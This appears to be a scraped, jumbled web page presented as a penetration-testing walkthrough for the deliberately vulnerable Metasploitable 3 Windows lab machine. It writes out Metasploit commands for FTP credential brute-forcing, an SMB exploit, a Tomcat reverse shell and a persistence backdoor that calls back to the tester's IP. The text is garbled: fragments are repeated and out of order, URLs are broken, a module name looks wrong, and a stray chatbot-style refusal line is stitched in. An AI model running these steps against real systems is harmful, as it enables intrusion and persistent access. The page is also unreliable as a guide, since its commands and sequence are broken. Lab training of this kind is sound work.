Metasploitable 3 is a premier, intentionally vulnerable virtual machine designed by Rapid7 for penetration testing training. Unlike its predecessor, Metasploitable 3 features a dedicated Windows environment (typically Windows Server 2012 R2). This environment simulates real-world corporate vulnerabilities, misconfigurations, and unpatched services.
msf6 > use auxiliary/scanner/ftp/ftp_login msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.36 msf6 auxiliary(scanner/ftp/ftp_login) > set USER_FILE /path/to/usernames.txt msf6 auxiliary(scanner/ftp/ftp_login) > set PASS_FILE /path/to/passwords.txt msf6 auxiliary(scanner/ftp/ftp_login) > run
Use the persistence module to maintain access after a reboot .
If you’re learning penetration testing legally, I can help with safe, lawful alternatives such as: metasploitable 3 windows walkthrough
: Check MySQL tables for hidden strings or admin credentials. Security Reminder Metasploitable 3 is an intentionally insecure environment.
Trigger the payload by navigating to http:// :8282/shell/ . You will receive a reverse shell as the tomcat user.
Use Metasploit's SMB login scanner to identify valid credentials: Trigger the payload by navigating to http:// :8282/shell/
use exploit/windows/smb/ms17_010_pwn2own set RHOST <IP address of Metasploitable 3 Windows> set LHOST <IP address of our machine> exploit
When a service executable path contains spaces and is not enclosed in quotation marks, Windows attempts to execute files at every space interval. Discovery:
Mastering Metasploitable 3 Windows: A Comprehensive Penetration Testing Walkthrough including 135 (RPC)
: Exploitation of application-layer vulnerabilities, such as unauthenticated access to Jenkins or misconfigured Tomcat servers, which can lead to privileged shell access.
The scan results reveal that the system has several open ports, including 135 (RPC), 139 (SMB), and 445 (SMB). This information can be used to identify potential vulnerabilities and plan the next steps.
run persistence -U -i 10 -p 4444 -r <Your_IP>